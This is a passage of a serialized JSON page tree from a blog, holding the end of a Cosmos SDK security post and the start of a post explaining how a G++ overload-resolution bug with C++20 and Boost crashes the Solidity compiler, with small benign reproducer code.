NewKVStoreKey",{"type":25,"tag":216,"props":93582,"children":93583},{"style":6964},[93584],{"type":31,"value":1850},{"type":25,"tag":216,"props":93586,"children":93587},{"style":6947},[93588],{"type":31,"value":52467},{"type":25,"tag":216,"props":93590,"children":93591},{"style":6964},[93592],{"type":31,"value":7107},{"type":25,"tag":216,"props":93594,"children":93595},{"class":6922,"line":7110},[93596],{"type":25,"tag":216,"props":93597,"children":93598},{"style":6964},[93599],{"type":31,"value":7311},{"type":25,"tag":216,"props":93601,"children":93602},{"class":6922,"line":7216},[93603],{"type":25,"tag":216,"props":93604,"children":93605},{"emptyLinePlaceholder":16},[93606],{"type":31,"value":7642},{"type":25,"tag":216,"props":93608,"children":93609},{"class":6922,"line":7244},[93610,93614],{"type":25,"tag":216,"props":93611,"children":93612},{"style":6973},[93613],{"type":31,"value":20947},{"type":25,"tag":216,"props":93615,"children":93616},{"style":6947},[93617],{"type":31,"value":93618}," keys\n",{"type":25,"tag":216,"props":93620,"children":93621},{"class":6922,"line":7257},[93622],{"type":25,"tag":216,"props":93623,"children":93624},{"style":6964},[93625],{"type":31,"value":7874},{"type":25,"tag":38,"props":93627,"children":93628},{},[93629,93631,93636,93638,93643,93645,93650],{"type":31,"value":93630},"Thanks to the diligence of core developers, checks are now enforced and the ",{"type":25,"tag":82,"props":93632,"children":93634},{"className":93633},[],[93635],{"type":31,"value":82434},{"type":31,"value":93637}," will refuse to run if any ",{"type":25,"tag":82,"props":93639,"children":93641},{"className":93640},[],[93642],{"type":31,"value":88948},{"type":31,"value":93644}," keys are prefix of each other. This implementation alleviates developers from having to worry about key collisions on the ",{"type":25,"tag":82,"props":93646,"children":93648},{"className":93647},[],[93649],{"type":31,"value":88948},{"type":31,"value":93651}," level.",{"type":25,"tag":38,"props":93653,"children":93654},{},[93655,93657,93664],{"type":31,"value":93656},"Additional storage key issues like subtle bugs in the Cosmos-SDK have resulted in ",{"type":25,"tag":162,"props":93658,"children":93661},{"href":93659,"rel":93660},"https://github.com/cosmos/cosmos-sdk/issues/12661",[166],[93662],{"type":31,"value":93663},"incorrect iterator behavior",{"type":31,"value":179},{"type":25,"tag":38,"props":93666,"children":93667},{},[93668,93670,93677],{"type":31,"value":93669},"Notably, gradual adoption of the ",{"type":25,"tag":162,"props":93671,"children":93674},{"href":93672,"rel":93673},"https://github.com/cosmos/cosmos-sdk/tree/def657dafa615cb8e8bb072452663893157e073a/collections",[166],[93675],{"type":31,"value":93676},"collections",{"type":31,"value":93678}," storage helpers since Cosmos v0.50 has made it a lot more difficult to write buggy code. This demonstrates the importance of keeping up to date with the latest SDK development to leverage architectural security improvements.",{"type":25,"tag":26,"props":93680,"children":93681},{"id":32892},[93682],{"type":31,"value":22907},{"type":25,"tag":38,"props":93684,"children":93685},{},[93686],{"type":31,"value":93687},"The Cosmos SDK is a powerful tool for those who want to create custom blockchains. However, this flexibility brings about great responsibility. Developers must pay close attention to nuances, as these can expose a large number of potential attack surfaces.",{"type":25,"tag":38,"props":93689,"children":93690},{},[93691],{"type":31,"value":93692},"To recap, we discussed some of the more basic parts of Cosmos-SDK, showcasing common mistakes developers tend to make. Yet, it is important to note that we've only covered the tip of the iceberg. Other attack surfaces, such as authentications in relation to the IBC interface, are fundamentals absolutely worth looking into.",{"type":25,"tag":9316,"props":93694,"children":93695},{},[93696],{"type":31,"value":9320},{"title":7,"searchDepth":6769,"depth":6769,"links":93698},[93699,93700,93703,93706,93709,93712,93715,93718],{"id":32975,"depth":6769,"text":32978},{"id":79853,"depth":6769,"text":79856,"children":93701},[93702],{"id":80658,"depth":6778,"text":80661},{"id":81254,"depth":6769,"text":81257,"children":93704},[93705],{"id":81903,"depth":6778,"text":80661},{"id":82400,"depth":6769,"text":82403,"children":93707},[93708],{"id":83700,"depth":6778,"text":80661},{"id":85044,"depth":6769,"text":85047,"children":93710},[93711],{"id":85582,"depth":6778,"text":80661},{"id":87101,"depth":6769,"text":87104,"children":93713},[93714],{"id":87981,"depth":6778,"text":80661},{"id":88934,"depth":6769,"text":88937,"children":93716},[93717],{"id":93360,"depth":6778,"text":80661},{"id":32892,"depth":6769,"text":22907},"content:blog:2025-06-10-cosmos-security.md","blog/2025-06-10-cosmos-security.md","blog/2025-06-10-cosmos-security",{"_path":93723,"_dir":5,"_draft":6,"_partial":6,"_locale":7,"title":93724,"description":93725,"author":93726,"image":93727,"date":93729,"tags":93730,"isFeatured":16,"onBlogPage":16,"body":93731,"_type":6798,"_id":96440,"_source":6800,"_file":96441,"_stem":96442,"_extension":6803},"/blog/2025-08-11-compiler-bug-causes-compiler-bug","Compiler Bug Causes Compiler Bug: How a 12-Year-Old G++ Bug Took Down Solidity","A subtle G++ bug from 2012, C++20's new comparison rules, and legacy Boost code can collide to crash Solidity's compiler on valid code. We unpack the surprising chain reaction and how to fix it.","kiprey",{"src":93728,"height":17580,"width":17580},"/posts/compiler-bug-causes-compiler-bug/title.png","2025-08-11",[8422,32970],{"type":22,"children":93732,"toc":96424},[93733,93738,93875,93880,93885,93890,93895,94008,94013,94018,94023,94063,94076,94081,94099,94104,94107,94113,94127,94140,94145,94158,94163,94175,94188,94193,94196,94202,94208,94265,94270,94276,94290,94325,94333,94341,94361,94367,94372,94812,94820,94864,94869,94877,94885,94924,94929,94937,94942,94945,94951,94957,94982,94994,95021,95054,95059,95062,95068,95087,95605,95618,95636,95659,95670,95675,95778,95783,95788,95802,95807,95883,95901,95906,95909,95915,95927,95939,96279,96284,96302,96307,96310,96316,96321,96339,96359,96362,96368,96387,96390,96394,96399,96410,96415,96420],{"type":25,"tag":38,"props":93734,"children":93735},{},[93736],{"type":31,"value":93737},"Compilers aren't supposed to crash — especially not when compiling perfectly valid code like this:",{"type":25,"tag":206,"props":93739,"children":93741},{"code":93740,"language":8422,"meta":7,"className":8423,"style":7},"// SPDX-License-Identifier: UNLICENSED\npragma solidity ^0.8.25;\n\ncontract A {\n    function a() public pure returns (uint256) {\n        return 1 ** 2;\n    }\n}\n",[93742],{"type":25,"tag":82,"props":93743,"children":93744},{"__ignoreMap":7},[93745,93753,93771,93778,93795,93837,93861,93868],{"type":25,"tag":216,"props":93746,"children":93747},{"class":6922,"line":6923},[93748],{"type":25,"tag":216,"props":93749,"children":93750},{"style":6927},[93751],{"type":31,"value":93752},"// SPDX-License-Identifier: UNLICENSED\n",{"type":25,"tag":216,"props":93754,"children":93755},{"class":6922,"line":6769},[93756,93761,93766],{"type":25,"tag":216,"props":93757,"children":93758},{"style":6973},[93759],{"type":31,"value":93760},"pragma",{"type":25,"tag":216,"props":93762,"children":93763},{"style":6936},[93764],{"type":31,"value":93765}," solidity",{"type":25,"tag":216,"props":93767,"children":93768},{"style":6964},[93769],{"type":31,"value":93770}," ^0.8.25;\n",{"type":25,"tag":216,"props":93772,"children":93773},{"class":6922,"line":6778},[93774],{"type":25,"tag":216,"props":93775,"children":93776},{"emptyLinePlaceholder":16},[93777],{"type":31,"value":7642},{"type":25,"tag":216,"props":93779,"children":93780},{"class":6922,"line":7005},[93781,93786,93791],{"type":25,"tag":216,"props":93782,"children":93783},{"style":6936},[93784],{"type":31,"value":93785},"contract",{"type":25,"tag":216,"props":93787,"children":93788},{"style":7375},[93789],{"type":31,"value":93790}," A",{"type":25,"tag":216,"props":93792,"children":93793},{"style":6964},[93794],{"type":31,"value":7241},{"type":25,"tag":216,"props":93796,"children":93797},{"class":6922,"line":7110},[93798,93803,93808,93812,93816,93821,93825,93829,93833],{"type":25,"tag":216,"props":93799,"children":93800},{"style":6936},[93801],{"type":31,"value":93802},"    function",{"type":25,"tag":216,"props":93804,"children":93805},{"style":7047},[93806],{"type":31,"value":93807}," a",{"type":25,"tag":216,"props":93809,"children":93810},{"style":6964},[93811],{"type":31,"value":18000},{"type":25,"tag":216,"props":93813,"children":93814},{"style":6936},[93815],{"type":31,"value":65643},{"type":25,"tag":216,"props":93817,"children":93818},{"style":6936},[93819],{"type":31,"value":93820}," pure",{"type":25,"tag":216,"props":93822,"children":93823},{"style":6973},[93824],{"type":31,"value":79965},{"type":25,"tag":216,"props":93826,"children":93827},{"style":6964},[93828],{"type":31,"value":7016},{"type":25,"tag":216,"props":93830,"children":93831},{"style":7375},[93832],{"type":31,"value":50136},{"type":25,"tag":216,"props":93834,"children":93835},{"style":6964},[93836],{"type":31,"value":18761},{"type":25,"tag":216,"props":93838,"children":93839},{"class":6922,"line":7216},[93840,93844,93848,93853,93857],{"type":25,"tag":216,"props":93841,"children":93842},{"style":6973},[93843],{"type":31,"value":19702},{"type":25,"tag":216,"props":93845,"children":93846},{"style":6989},[93847],{"type":31,"value":8471},{"type":25,"tag":216,"props":93849,"children":93850},{"style":6953},[93851],{"type":31,"value":93852}," **",{"type":25,"tag":216,"props":93854,"children":93855},{"style":6989},[93856],{"type":31,"value":11886},{"type":25,"tag":216,"props":93858,"children":93859},{"style":6964},[93860],{"type":31,"value":6967},{"type":25,"tag":216,"props":93862,"children":93863},{"class":6922,"line":7244},[93864],{"type":25,"tag":216,"props":93865,"children":93866},{"style":6964},[93867],{"type":31,"value":7311},{"type":25,"tag":216,"props":93869,"children":93870},{"class":6922,"line":7257},[93871],{"type":25,"tag":216,"props":93872,"children":93873},{"style":6964},[93874],{"type":31,"value":7874},{"type":25,"tag":38,"props":93876,"children":93877},{},[93878],{"type":31,"value":93879},"Yet running Solidity's compiler (solc) on this file on a standard Ubuntu 22.04 system (G++ 11.4, Boost 1.74) causes an immediate segmentation fault.",{"type":25,"tag":38,"props":93881,"children":93882},{},[93883],{"type":31,"value":93884},"At first, this seemed absurd. The code just returns 1 to the power of 2 — no memory tricks, unsafe casting, or undefined behavior.",{"type":25,"tag":38,"props":93886,"children":93887},{},[93888],{"type":31,"value":93889},"And yet, it crashes.",{"type":25,"tag":38,"props":93891,"children":93892},{},[93893],{"type":31,"value":93894},"Another minimal example?",{"type":25,"tag":206,"props":93896,"children":93898},{"code":93897,"language":8422,"meta":7,"className":8423,"style":7},"// SPDX-License-Identifier: UNLICENSED\npragma solidity ^0.8.25;\n\ncontract A {\n    function a() public pure {\n        uint256[1] data;\n    }\n}\n",[93899],{"type":25,"tag":82,"props":93900,"children":93901},{"__ignoreMap":7},[93902,93909,93924,93931,93946,93973,93994,94001],{"type":25,"tag":216,"props":93903,"children":93904},{"class":6922,"line":6923},[93905],{"type":25,"tag":216,"props":93906,"children":93907},{"style":6927},[93908],{"type":31,"value":93752},{"type":25,"tag":216,"props":93910,"children":93911},{"class":6922,"line":6769},[93912,93916,93920],{"type":25,"tag":216,"props":93913,"children":93914},{"style":6973},[93915],{"type":31,"value":93760},{"type":25,"tag":216,"props":93917,"children":93918},{"style":6936},[93919],{"type":31,"value":93765},{"type":25,"tag":216,"props":93921,"children":93922},{"style":6964},[93923],{"type":31,"value":93770},{"type":25,"tag":216,"props":93925,"children":93926},{"class":6922,"line":6778},[93927],{"type":25,"tag":216,"props":93928,"children":93929},{"emptyLinePlaceholder":16},[93930],{"type":31,"value":7642},{"type":25,"tag":216,"props":93932,"children":93933},{"class":6922,"line":7005},[93934,93938,93942],{"type":25,"tag":216,"props":93935,"children":93936},{"style":6936},[93937],{"type":31,"value":93785},{"type":25,"tag":216,"props":93939,"children":93940},{"style":7375},[93941],{"type":31,"value":93790},{"type":25,"tag":216,"props":93943,"children":93944},{"style":6964},[93945],{"type":31,"value":7241},{"type":25,"tag":216,"props":93947,"children":93948},{"class":6922,"line":7110},[93949,93953,93957,93961,93965,93969],{"type":25,"tag":216,"props":93950,"children":93951},{"style":6936},[93952],{"type":31,"value":93802},{"type":25,"tag":216,"props":93954,"children":93955},{"style":7047},[93956],{"type":31,"value":93807},{"type":25,"tag":216,"props":93958,"children":93959},{"style":6964},[93960],{"type":31,"value":18000},{"type":25,"tag":216,"props":93962,"children":93963},{"style":6936},[93964],{"type":31,"value":65643},{"type":25,"tag":216,"props":93966,"children":93967},{"style":6936},[93968],{"type":31,"value":93820},{"type":25,"tag":216,"props":93970,"children":93971},{"style":6964},[93972],{"type":31,"value":7241},{"type":25,"tag":216,"props":93974,"children":93975},{"class":6922,"line":7216},[93976,93981,93985,93989],{"type":25,"tag":216,"props":93977,"children":93978},{"style":7375},[93979],{"type":31,"value":93980},"        uint256",{"type":25,"tag":216,"props":93982,"children":93983},{"style":6964},[93984],{"type":31,"value":7701},{"type":25,"tag":216,"props":93986,"children":93987},{"style":6989},[93988],{"type":31,"value":184},{"type":25,"tag":216,"props":93990,"children":93991},{"style":6964},[93992],{"type":31,"value":93993},"] data;\n",{"type":25,"tag":216,"props":93995,"children":93996},{"class":6922,"line":7244},[93997],{"type":25,"tag":216,"props":93998,"children":93999},{"style":6964},[94000],{"type":31,"value":7311},{"type":25,"tag":216,"props":94002,"children":94003},{"class":6922,"line":7257},[94004],{"type":25,"tag":216,"props":94005,"children":94006},{"style":6964},[94007],{"type":31,"value":7874},{"type":25,"tag":38,"props":94009,"children":94010},{},[94011],{"type":31,"value":94012},"Still crashes.",{"type":25,"tag":38,"props":94014,"children":94015},{},[94016],{"type":31,"value":94017},"So what’s going on?",{"type":25,"tag":38,"props":94019,"children":94020},{},[94021],{"type":31,"value":94022},"We traced it down to a seemingly unrelated C++ line deep in the compiler backend:",{"type":25,"tag":206,"props":94024,"children":94026},{"code":94025,"language":33072,"meta":7,"className":33070,"style":7},"if (*lengthValue == 0) { ... }\n",[94027],{"type":25,"tag":82,"props":94028,"children":94029},{"__ignoreMap":7},[94030],{"type":25,"tag":216,"props":94031,"children":94032},{"class":6922,"line":6923},[94033,94037,94041,94045,94050,94054,94058],{"type":25,"tag":216,"props":94034,"children":94035},{"style":6973},[94036],{"type":31,"value":19537},{"type":25,"tag":216,"props":94038,"children":94039},{"style":6964},[94040],{"type":31,"value":7016},{"type":25,"tag":216,"props":94042,"children":94043},{"style":6953},[94044],{"type":31,"value":8519},{"type":25,"tag":216,"props":94046,"children":94047},{"style":6964},[94048],{"type":31,"value":94049},"lengthValue ",{"type":25,"tag":216,"props":94051,"children":94052},{"style":6953},[94053],{"type":31,"value":12528},{"type":25,"tag":216,"props":94055,"children":94056},{"style":6989},[94057],{"type":31,"value":6992},{"type":25,"tag":216,"props":94059,"children":94060},{"style":6964},[94061],{"type":31,"value":94062},") { ... }\n",{"type":25,"tag":38,"props":94064,"children":94065},{},[94066,94068,94074],{"type":31,"value":94067},"That single comparison — a ",{"type":25,"tag":82,"props":94069,"children":94071},{"className":94070},[],[94072],{"type":31,"value":94073},"boost::rational",{"type":31,"value":94075}," compared to 0 — causes infinite recursion in G++ \u003C 14 when compiled under C++20. And the resulting stack overflow crashes solc.",{"type":25,"tag":38,"props":94077,"children":94078},{},[94079],{"type":31,"value":94080},"This post unpacks how this happened — and why none of the individual components are technically \"broken\":",{"type":25,"tag":2039,"props":94082,"children":94083},{},[94084,94089,94094],{"type":25,"tag":2043,"props":94085,"children":94086},{},[94087],{"type":31,"value":94088},"A 12-year-old overload resolution bug in G++",{"type":25,"tag":2043,"props":94090,"children":94091},{},[94092],{"type":31,"value":94093},"An outdated symmetric comparison pattern in Boost",{"type":25,"tag":2043,"props":94095,"children":94096},{},[94097],{"type":31,"value":94098},"A subtle but impactful rewrite rule in C++20",{"type":25,"tag":38,"props":94100,"children":94101},{},[94102],{"type":31,"value":94103},"Put together, they form a perfect storm — one that takes down Solidity compilation on default Linux setups, even though your code is perfectly fine.",{"type":25,"tag":22753,"props":94105,"children":94106},{},[],{"type":25,"tag":26,"props":94108,"children":94110},{"id":94109},"background-the-setup",[94111],{"type":31,"value":94112},"Background: The Setup",{"type":25,"tag":38,"props":94114,"children":94115},{},[94116,94118,94125],{"type":31,"value":94117},"If you follow the ",{"type":25,"tag":162,"props":94119,"children":94122},{"href":94120,"rel":94121},"https://docs.soliditylang.org/en/v0.8.30/installing-solidity.html#building-from-source",[166],[94123],{"type":31,"value":94124},"Solidity build documentation (v0.8.30)",{"type":31,"value":94126},", you'll see it recommends:",{"type":25,"tag":2039,"props":94128,"children":94129},{},[94130,94135],{"type":25,"tag":2043,"props":94131,"children":94132},{},[94133],{"type":31,"value":94134},"Boost ≥ 1.67",{"type":25,"tag":2043,"props":94136,"children":94137},{},[94138],{"type":31,"value":94139},"GCC ≥ 11",{"type":25,"tag":38,"props":94141,"children":94142},{},[94143],{"type":31,"value":94144},"Ubuntu 22.04, for example, ships with:",{"type":25,"tag":2039,"props":94146,"children":94147},{},[94148,94153],{"type":25,"tag":2043,"props":94149,"children":94150},{},[94151],{"type":31,"value":94152},"G++ 11.4.0",{"type":25,"tag":2043,"props":94154,"children":94155},{},[94156],{"type":31,"value":94157},"Boost 1.74.0",{"type":25,"tag":38,"props":94159,"children":94160},{},[94161],{"type":31,"value":94162},"So far, so good.",{"type":25,"tag":38,"props":94164,"children":94165},{},[94166,94168,94173],{"type":31,"value":94167},"However, Solidity enabled ",{"type":25,"tag":9273,"props":94169,"children":94170},{},[94171],{"type":31,"value":94172},"C++20",{"type":31,"value":94174}," in January 2025:",{"type":25,"tag":34,"props":94176,"children":94177},{},[94178],{"type":25,"tag":38,"props":94179,"children":94180},{},[94181],{"type":25,"tag":162,"props":94182,"children":94185},{"href":94183,"rel":94184},"https://github.com/ethereum/solidity/commit/233a5081835a04939ccf85dfb5286c0b53d23c66",[166],[94186],{"type":31,"value":94187},"Enable C++20 in Solidity",{"type":25,"tag":38,"props":94189,"children":94190},{},[94191],{"type":31,"value":94192},"This wasn't accompanied by an update to the versions of dependencies in the documentation. As we'll soon see, that's what opened the trapdoor.",{"type":25,"tag":22753,"props":94194,"children":94195},{},[],{"type":25,"tag":26,"props":94197,"children":94199},{"id":94198},"part-i-a-12-year-old-g-bug-in-overload-resolution",[94200],{"type":31,"value":94201},"Part I: A 12-Year-Old G++ Bug in Overload Resolution",{"type":25,"tag":606,"props":94203,"children":94205},{"id":94204},"whats-overload-resolution",[94206],{"type":31,"value":94207},"What’s Overload Resolution?",{"type":25,"tag":38,"props":94209,"children":94210},{},[94211,94213,94219,94221,94227,94229,94234,94236,94241,94243,94249,94251,94256,94257,94263],{"type":31,"value":94212},"In C++, when you write an expression like ",{"type":25,"tag":82,"props":94214,"children":94216},{"className":94215},[],[94217],{"type":31,"value":94218},"a == b",{"type":31,"value":94220},", the compiler chooses among available ",{"type":25,"tag":82,"props":94222,"children":94224},{"className":94223},[],[94225],{"type":31,"value":94226},"operator==",{"type":31,"value":94228}," implementations by comparing their ",{"type":25,"tag":9273,"props":94230,"children":94231},{},[94232],{"type":31,"value":94233},"match quality",{"type":31,"value":94235},". A ",{"type":25,"tag":9273,"props":94237,"children":94238},{},[94239],{"type":31,"value":94240},"member function",{"type":31,"value":94242}," like ",{"type":25,"tag":82,"props":94244,"children":94246},{"className":94245},[],[94247],{"type":31,"value":94248},"a.operator==(b)",{"type":31,"value":94250}," usually has higher priority than a ",{"type":25,"tag":9273,"props":94252,"children":94253},{},[94254],{"type":31,"value":94255},"non-member function",{"type":31,"value":94242},{"type":25,"tag":82,"props":94258,"children":94260},{"className":94259},[],[94261],{"type":31,"value":94262},"operator==(a, b)",{"type":31,"value":94264}," — unless the types differ too much or are ambiguous.",{"type":25,"tag":38,"props":94266,"children":94267},{},[94268],{"type":31,"value":94269},"That’s the rule. But G++ didn’t always follow it.",{"type":25,"tag":606,"props":94271,"children":94273},{"id":94272},"the-bug",[94274],{"type":31,"value":94275},"The Bug",{"type":25,"tag":38,"props":94277,"children":94278},{},[94279,94281,94288],{"type":31,"value":94280},"In 2012, a bug was filed: ",{"type":25,"tag":162,"props":94282,"children":94285},{"href":94283,"rel":94284},"https://gcc.gnu.org/bugzilla/show_bug.cgi?id=53499",[166],[94286],{"type":31,"value":94287},"GCC Bug 53499 – overload resolution favors non-member function",{"type":31,"value":94289},". The issue? In expressions where:",{"type":25,"tag":2039,"props":94291,"children":94292},{},[94293,94313],{"type":25,"tag":2043,"props":94294,"children":94295},{},[94296,94298,94304,94306,94311],{"type":31,"value":94297},"A class ",{"type":25,"tag":82,"props":94299,"children":94301},{"className":94300},[],[94302],{"type":31,"value":94303},"rational\u003CT>",{"type":31,"value":94305}," has a templated ",{"type":25,"tag":82,"props":94307,"children":94309},{"className":94308},[],[94310],{"type":31,"value":94226},{"type":31,"value":94312}," member function",{"type":25,"tag":2043,"props":94314,"children":94315},{},[94316,94318,94324],{"type":31,"value":94317},"There's also a more generic free ",{"type":25,"tag":82,"props":94319,"children":94321},{"className":94320},[],[94322],{"type":31,"value":94323},"operator==(rational\u003CT>, U)",{"type":31,"value":42177},{"type":25,"tag":38,"props":94326,"children":94327},{},[94328],{"type":25,"tag":9273,"props":94329,"children":94330},{},[94331],{"type":31,"value":94332},"Clang correctly chooses the member function.",{"type":25,"tag":38,"props":94334,"children":94335},{},[94336],{"type":25,"tag":9273,"props":94337,"children":94338},{},[94339],{"type":31,"value":94340},"G++ (before v14) chooses the non-member function.",{"type":25,"tag":38,"props":94342,"children":94343},{},[94344,94346,94351,94353,94360],{"type":31,"value":94345},"Why? Because G++ mishandles ",{"type":25,"tag":9273,"props":94347,"children":94348},{},[94349],{"type":31,"value":94350},"templated conversion + non-exact match",{"type":31,"value":94352},", overvaluing a non-member function with worse match quality. It does not correctly apply the overload resolution ranking rules defined in ",{"type":25,"tag":162,"props":94354,"children":94357},{"href":94355,"rel":94356},"https://cplusplus.github.io/CWG/issues/532.html",[166],[94358],{"type":31,"value":94359},"CWG532: Member/nonmember operator template partial ordering",{"type":31,"value":179},{"type":25,"tag":606,"props":94362,"children":94364},{"id":94363},"a-minimal-reproducer",[94365],{"type":31,"value":94366},"A Minimal Reproducer",{"type":25,"tag":38,"props":94368,"children":94369},{},[94370],{"type":31,"value":94371},"Let’s see this in action:",{"type":25,"tag":206,"props":94373,"children":94375},{"code":94374,"language":33072,"meta":7,"className":33070,"style":7},"#include \u003Ciostream>\n\ntemplate \u003Ctypename IntType>\nclass rational {\npublic:\n    template \u003Cclass T>\n    bool operator==(const T& i) const {\n        std::cout \u003C\u003C \"clang++ resolved member\" \u003C\u003C std::endl;\n        return true;\n    }\n};\n\ntemplate \u003Cclass Arg, class IntType>\nbool operator==(const rational\u003CIntType>& a, const Arg& b) {\n    std::cout \u003C\u003C \"g++ \u003C14 resolved non-member\" \u003C\u003C std::endl;\n    return false;\n}\n\nint main() {\n    rational\u003Cint> r;\n    return r == 0;\n}\n",[94376],{"type":25,"tag":82,"props":94377,"children":94378},{"__ignoreMap":7},[94379,94392,94399,94424,94440,94448,94472,94517,94545,94560,94567,94574,94581,94617,94686,94711,94726,94733,94740,94756,94781,94805],{"type":25,"tag":216,"props":94380,"children":94381},{"class":6922,"line":6923},[94382,94387],{"type":25,"tag":216,"props":94383,"children":94384},{"style":6973},[94385],{"type":31,"value":94386},"#include",{"type":25,"tag":216,"props":94388,"children":94389},{"style":8205},[94390],{"type":31,"value":94391}," \u003Ciostream>\n",{"type":25,"tag":216,"props":94393,"children":94394},{"class":6922,"line":6769},[94395],{"type":25,"tag":216,"props":94396,"children":94397},{"emptyLinePlaceholder":16},[94398],{"type":31,"value":7642},{"type":25,"tag":216,"props":94400,"children":94401},{"class":6922,"line":6778},[94402,94406,94410,94415,94420],{"type":25,"tag":216,"props":94403,"children":94404},{"style":6936},[94405],{"type":31,"value":70185},{"type":25,"tag":216,"props":94407,"children":94408},{"style":6964},[94409],{"type":31,"value":12672},{"type":25,"tag":216,"props":94411,"children":94412},{"style":6936},[94413],{"type":31,"value":94414},"typename",{"type":25,"tag":216,"props":94416,"children":94417},{"style":7375},[94418],{"type":31,"value":94419}," IntType",{"type":25,"tag":216,"props":94421,"children":94422},{"style":6964},[94423],{"type":31,"value":9943},{"type":25,"tag":216,"props":94425,"children":94426},{"class":6922,"line":7005},[94427,94431,94436],{"type":25,"tag":216,"props":94428,"children":94429},{"style":6936},[94430],{"type":31,"value":74380},{"type":25,"tag":216,"props":94432,"children":94433},{"style":7375},[94434],{"type":31,"value":94435}," rational",{"type":25,"tag":216,"props":94437,"children":94438},{"style":6964},[94439],{"type":31,"value":7241},{"type":25,"tag":216,"props":94441,"children":94442},{"class":6922,"line":7110},[94443],{"type":25,"tag":216,"props":94444,"children":94445},{"style":6936},[94446],{"type":31,"value":94447},"public:\n",{"type":25,"tag":216,"props":94449,"children":94450},{"class":6922,"line":7216},[94451,94456,94460,94464,94468],{"type":25,"tag":216,"props":94452,"children":94453},{"style":6936},[94454],{"type":31,"value":94455},"    template",{"type":25,"tag":216,"props":94457,"children":94458},{"style":6964},[94459],{"type":31,"value":12672},{"type":25,"tag":216,"props":94461,"children":94462},{"style":6936},[94463],{"type":31,"value":74380},{"type":25,"tag":216,"props":94465,"children":94466},{"style":7375},[94467],{"type":31,"value":9870},{"type":25,"tag":216,"props":94469,"children":94470},{"style":6964},[94471],{"type":31,"value":9943},{"type":25,"tag":216,"props":94473,"children":94474},{"class":6922,"line":7244},[94475,94479,94484,94489,94493,94497,94501,94505,94509,94513],{"type":25,"tag":216,"props":94476,"children":94477},{"style":6936},[94478],{"type":31,"value":50441},{"type":25,"tag":216,"props":94480,"children":94481},{"style":6936},[94482],{"type":31,"value":94483}," operator",{"type":25,"tag":216,"props":94485,"children":94486},{"style":6964},[94487],{"type":31,"value":94488},"==(",{"type":25,"tag":216,"props":94490,"children":94491},{"style":6936},[94492],{"type":31,"value":13611},{"type":25,"tag":216,"props":94494,"children":94495},{"style":7375},[94496],{"type":31,"value":9870},{"type":25,"tag":216,"props":94498,"children":94499},{"style":6936},[94500],{"type":31,"value":7059},{"type":25,"tag":216,"props":94502,"children":94503},{"style":6947},[94504],{"type":31,"value":7354},{"type":25,"tag":216,"props":94506,"children":94507},{"style":6964},[94508],{"type":31,"value":7036},{"type":25,"tag":216,"props":94510,"children":94511},{"style":6936},[94512],{"type":31,"value":13611},{"type":25,"tag":216,"props":94514,"children":94515},{"style":6964},[94516],{"type":31,"value":7241},{"type":25,"tag":216,"props":94518,"children":94519},{"class":6922,"line":7257},[94520,94525,94530,94535,94540],{"type":25,"tag":216,"props":94521,"children":94522},{"style":6964},[94523],{"type":31,"value":94524},"        std::cout ",{"type":25,"tag":216,"props":94526,"children":94527},{"style":6953},[94528],{"type":31,"value":94529},"\u003C\u003C",{"type":25,"tag":216,"props":94531,"children":94532},{"style":8205},[94533],{"type":31,"value":94534}," \"clang++ resolved member\"",{"type":25,"tag":216,"props":94536,"children":94537},{"style":6953},[94538],{"type":31,"value":94539}," \u003C\u003C",{"type":25,"tag":216,"props":94541,"children":94542},{"style":6964},[94543],{"type":31,"value":94544}," std::endl;\n",{"type":25,"tag":216,"props":94546,"children":94547},{"class":6922,"line":7275},[94548,94552,94556],{"type":25,"tag":216,"props":94549,"children":94550},{"style":6973},[94551],{"type":31,"value":19702},{"type":25,"tag":216,"props":94553,"children":94554},{"style":6936},[94555],{"type":31,"value":16425},{"type":25,"tag":216,"props":94557,"children":94558},{"style":6964},[94559],{"type":31,"value":6967},{"type":25,"tag":216,"props":94561,"children":94562},{"class":6922,"line":7296},[94563],{"type":25,"tag":216,"props":94564,"children":94565},{"style":6964},[94566],{"type":31,"value":7311},{"type":25,"tag":216,"props":94568,"children":94569},{"class":6922,"line":7305},[94570],{"type":25,"tag":216,"props":94571,"children":94572},{"style":6964},[94573],{"type":31,"value":20536},{"type":25,"tag":216,"props":94575,"children":94576},{"class":6922,"line":7557},[94577],{"type":25,"tag":216,"props":94578,"children":94579},{"emptyLinePlaceholder":16},[94580],{"type":31,"value":7642},{"type":25,"tag":216,"props":94582,"children":94583},{"class":6922,"line":7574},[94584,94588,94592,94596,94601,94605,94609,94613],{"type":25,"tag":216,"props":94585,"children":94586},{"style":6936},[94587],{"type":31,"value":70185},{"type":25,"tag":216,"props":94589,"children":94590},{"style":6964},[94591],{"type":31,"value":12672},{"type":25,"tag":216,"props":94593,"children":94594},{"style":6936},[94595],{"type":31,"value":74380},{"type":25,"tag":216,"props":94597,"children":94598},{"style":7375},[94599],{"type":31,"value":94600}," Arg",{"type":25,"tag":216,"props":94602,"children":94603},{"style":6964},[94604],{"type":31,"value":7026},{"type":25,"tag":216,"props":94606,"children":94607},{"style":6936},[94608],{"type":31,"value":74380},{"type":25,"tag":216,"props":94610,"children":94611},{"style":7375},[94612],{"type":31,"value":94419},{"type":25,"tag":216,"props":94614,"children":94615},{"style":6964},[94616],{"type":31,"value":9943},{"type":25,"tag":216,"props":94618,"children":94619},{"class":6922,"line":7591},[94620,94624,94628,94632,94636,94640,94644,94649,94653,94657,94661,94665,94669,94673,94677,94682],{"type":25,"tag":216,"props":94621,"children":94622},{"style":6936},[94623],{"type":31,"value":33646},{"type":25,"tag":216,"props":94625,"children":94626},{"style":6936},[94627],{"type":31,"value":94483},{"type":25,"tag":216,"props":94629,"children":94630},{"style":6964},[94631],{"type":31,"value":94488},{"type":25,"tag":216,"props":94633,"children":94634},{"style":6936},[94635],{"type":31,"value":13611},{"type":25,"tag":216,"props":94637,"children":94638},{"style":7375},[94639],{"type":31,"value":94435},{"type":25,"tag":216,"props":94641,"children":94642},{"style":6964},[94643],{"type":31,"value":9757},{"type":25,"tag":216,"props":94645,"children":94646},{"style":7375},[94647],{"type":31,"value":94648},"IntType",{"type":25,"tag":216,"props":94650,"children":94651},{"style":6964},[94652],{"type":31,"value":5902},{"type":25,"tag":216,"props":94654,"children":94655},{"style":6936},[94656],{"type":31,"value":7059},{"type":25,"tag":216,"props":94658,"children":94659},{"style":6947},[94660],{"type":31,"value":93807},{"type":25,"tag":216,"props":94662,"children":94663},{"style":6964},[94664],{"type":31,"value":7026},{"type":25,"tag":216,"props":94666,"children":94667},{"style":6936},[94668],{"type":31,"value":13611},{"type":25,"tag":216,"props":94670,"children":94671},{"style":7375},[94672],{"type":31,"value":94600},{"type":2